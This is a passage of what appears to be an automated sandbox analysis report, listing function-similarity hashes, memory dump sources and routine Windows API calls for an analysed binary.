      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Message$DispatchObjectPeekSingleTranslateWait
      • String ID:
      • API String ID: 3621893840-0
      • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
      • Instruction ID: 1a7edcc8462befd6a778f550f3a126019ba0bc084525f2fd760c6dbda79ef093
      • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
      • Instruction Fuzzy Hash: FBF04F39F2C466D2F721BB21E455A7AA251FFA4B06FC41130EA4E419949E6CE149C720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: __except_validate_context_recordabort
      • String ID: csm$csm
      • API String ID: 746414643-3733052814
      • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
      • Instruction ID: 33d4ec89228d88100b74323c3a8a78157889e9a8007802d86164ac7e2f3521b9
      • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
      • Instruction Fuzzy Hash: 0971F27A50C6A1C6D762BF25D84477EFBA1FB09B8AF448131DA4C07B89EB6CD490C710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: $*
      • API String ID: 3215553584-3982473090
      • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
      • Instruction ID: 0b0f8dd07d9918209b74a1f042714029394a0da8110a436aa99701d93aeacbef
      • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
      • Instruction Fuzzy Hash: CB51DB3A84C622CAF76EBE248D4877CB7A1FB42F0AF941135C64941199EFBCD442C725
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ByteCharMultiWide$StringType
      • String ID: $%s
      • API String ID: 3586891840-3791308623
      • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
      • Instruction ID: c9d289ba0efb2ab1e6202d77e15c03850f6c1821230a62d2d41d3ba8dd7f46f8
      • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
      • Instruction Fuzzy Hash: 4841A83AB18792C9EB52BF25D8016A9A391FB44BA9F8C0235DE2D077C5DF7CE4418350
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CreateFrameInfo__except_validate_context_recordabort
      • String ID: csm
      • API String ID: 2466640111-1018135373
      • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
      • Instruction ID: bbdb4c92e3590aefc12d1bf30fa30298b16f39daa5992bf0e3be422942e3dd40
      • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
      • Instruction Fuzzy Hash: 1551597A61C652C7D721BB16E84026FB7B4FB89B91F840134EA8D07B56EF78E461CB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ByteCharErrorFileLastMultiWideWrite
      • String ID: U
      • API String ID: 2456169464-4171548499
      • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
      • Instruction ID: f6cf832b2a9e4b187b1a14d75c02c0ca45b03cad7d2c8446dd30d1aa8b6c05e1
      • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
      • Instruction Fuzzy Hash: C641C32661CA92C2EB21BF25E8047B9A7A0FB98795F844031EE4D87B44DFBCD441C750
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ObjectRelease
      • String ID:
      • API String ID: 1429681911-3916222277
      • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
      • Instruction ID: b1386e333605ed0ffdcdaf0e455c527d00a8d6e97ce671d915db368db56f47cc
      • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
      • Instruction Fuzzy Hash: 02316C3970875296EB04BF16B808A2AB7A1F788FD2F814435EE4A43B54CF7CE049CB14
      APIs
      • InitializeCriticalSection.KERNEL32(?,?,?,00007FF741EB317F,?,?,00001000,00007FF741E9E51D), ref: 00007FF741EAE8BB
      • CreateSemaphoreW.KERNEL32(?,?,?,00007FF741EB317F,?,?,00001000,00007FF741E9E51D), ref: 00007FF741EAE8CB
      • CreateEventW.KERNEL32(?,?,?,00007FF741EB317F,?,?,00001000,00007FF741E9E51D), ref: 00007FF741EAE8E4
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Create$CriticalEventInitializeSectionSemaphore
      • String ID: Thread pool initialization failed.
      • API String ID: 3340455307-2182114853
      • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
      • Instruction ID: 0d2bfe1dd6cb98500fa04a9a4e6c972e93e439d38ddd2661404fd2b549ae8a85
      • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
      • Instruction Fuzzy Hash: 1121C936B1D612C6F711BF24D4447A97692FB84B49F9C8034CA0D0A295DFBE944587A4
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CapsDeviceRelease
      • String ID:
      • API String ID: 127614599-3916222277
      • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
      • Instruction ID: 26e8917050badf7f424c1ae36478512d8324874975876ba01e83f257b2affa9f
      • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
      • Instruction Fuzzy Hash: C2E08C28B0C641D6FB0877B6B58943AA261AB8CBD1F968035DE1A43794DE3CD4844310
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$FileTime
      • String ID:
      • API String ID: 1137671866-0
      • Opcode ID: 6a66750d7d38e285348c6a4672a5517d432b12a502a6a2b91e6f62eece89d76d
      • Instruction ID: 2044acab9ac274c34238d205b7384d574158437988b0da01eb62c4fbfc000878
      • Opcode Fuzzy Hash: 6a66750d7d38e285348c6a4672a5517d432b12a502a6a2b91e6f62eece89d76d
      • Instruction Fuzzy Hash: C1A1B266A2C7A2C1EB12FB65E8401EDA361FF86795F805131EA5C07A99DFBCE544C320
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ErrorLast
      • String ID:
      • API String ID: 1452528299-0
      • Opcode ID: 47ce399c8b5a93a9ee7e183f504d796df39c479f65169f8ae0637efe197c3b7b
      • Instruction ID: f3d90543fa243fe5aa7adfddf8544e694c6ca1aae0069da84f01ec007977c540
      • Opcode Fuzzy Hash: 47ce399c8b5a93a9ee7e183f504d796df39c479f65169f8ae0637efe197c3b7b
      • Instruction Fuzzy Hash: 9051C376F18652D5FB01FB64D4442FCA321FB85B99F804231DA1C17B96EFA8E141C360
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
      • String ID:
      • API String ID: 1077098981-0
      • Opcode ID: 5a43cb7f5a8bc2b697eb0b834037522765625dc86c8d5e2913923eaf6a834e49
      • Instruction ID: 131071d2c414950840b8c2326e3aa794e627640b6ccab56ea1e0cf9422d4796d
      • Opcode Fuzzy Hash: 5a43cb7f5a8bc2b697eb0b834037522765625dc86c8d5e2913923eaf6a834e49
      • Instruction Fuzzy Hash: D8516936A1CB62C6E701FF61E8447AAB3A5FB84B85F900135EA4E57A54DF7CE444CB10
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
      • String ID:
      • API String ID: 4141327611-0
      • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
      • Instruction ID: 3af2dfcdd40261e176dcc0d14c8d64e183e2c8c1bd4eaec60dbca062ac4017a4
      • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
      • Instruction Fuzzy Hash: 1941D83990C662C6F72BBB10D840779E290FF80792F944131DA5D06AC5EFAED841E760
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: FileMove_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3823481717-0
      • Opcode ID: 47dbf0decc8272d9a7ae459b130201949f9107b8ec80fb87a20ec63cf3da1f82
      • Instruction ID: c640fc4a24a11fc901b7e9c46ef49f1d8cdb0bc10cb33b1f577a226cb888a8fc
      • Opcode Fuzzy Hash: 47dbf0decc8272d9a7ae459b130201949f9107b8ec80fb87a20ec63cf3da1f82
      • Instruction Fuzzy Hash: D041B166F18772C5FB01FFB5D8441ACA371BB44B95B845231DE6D16A99EFB8D041C310
      APIs
      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF741ECC45B), ref: 00007FF741ED0B91
      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF741ECC45B), ref: 00007FF741ED0BF3
      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF741ECC45B), ref: 00007FF741ED0C2D
      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF741ECC45B), ref: 00007FF741ED0C57
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ByteCharEnvironmentMultiStringsWide$Free
      • String ID:
      • API String ID: 1557788787-0
      • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
      • Instruction ID: a5dc06125e15b36d872371f8d9f4a7894f90d1ff434c69df4399266be18fe287
      • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
      • Instruction Fuzzy Hash: DC218235A1CB62C5E725BF127440029E6A4FB54BD1B8C4134DEAE23BA4DF7CE4528314
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ErrorLast$abort
      • String ID:
      • API String ID: 1447195878-0
      • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
      • Instruction ID: aaabddb2ff03db654028b3607fc09bd8c5d5b99402e8942cd12e249afbf95f77
      • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
      • Instruction Fuzzy Hash: 8001AD1CA0C327C2FB1A77216D451B8D1A27F44792F844438DA2E427E6FEADF801D260
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CapsDevice$Release
      • String ID:
      • API String ID: 1035833867-0
      • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
      • Instruction ID: 5fa972a06c0e9288c655fe239ee4ed270ba11fd77149c61e48ca94c2f3fe8d42
      • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
      • Instruction Fuzzy Hash: 07E0ED68F0D612D2FF0A7B716859536A191BF48B43FC94439CC1E46350ED7CA0958720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: DXGIDebug.dll
      • API String ID: 3668304517-540382549
      • Opcode ID: 2b89549b7426e50bfd34945384ed8c0e8b0bf6c6c1231d7991053c614d04a2bf
      • Instruction ID: 85042c5b808fdb0e31143aa1a39c9bedb69e716135848dc888a4c2e0e8e17f4f
      • Opcode Fuzzy Hash: 2b89549b7426e50bfd34945384ed8c0e8b0bf6c6c1231d7991053c614d04a2bf
      • Instruction Fuzzy Hash: F7719B76A18B91C6EB15FB25E8403ADB3A4FB547D4F844225DBAC07B99DFB8E051C310
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: e+000$gfff
      • API String ID: 3215553584-3030954782
      • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
      • Instruction ID: 8fefe82afe84f98db43dd6756bf6e1d0742e9322f4aa4aff66297a3849c56ac5
      • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
      • Instruction Fuzzy Hash: 51515866B1C7D186E726BB399C4136DAF92B781B90F888231CA9C47BC5EF6CE440C710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
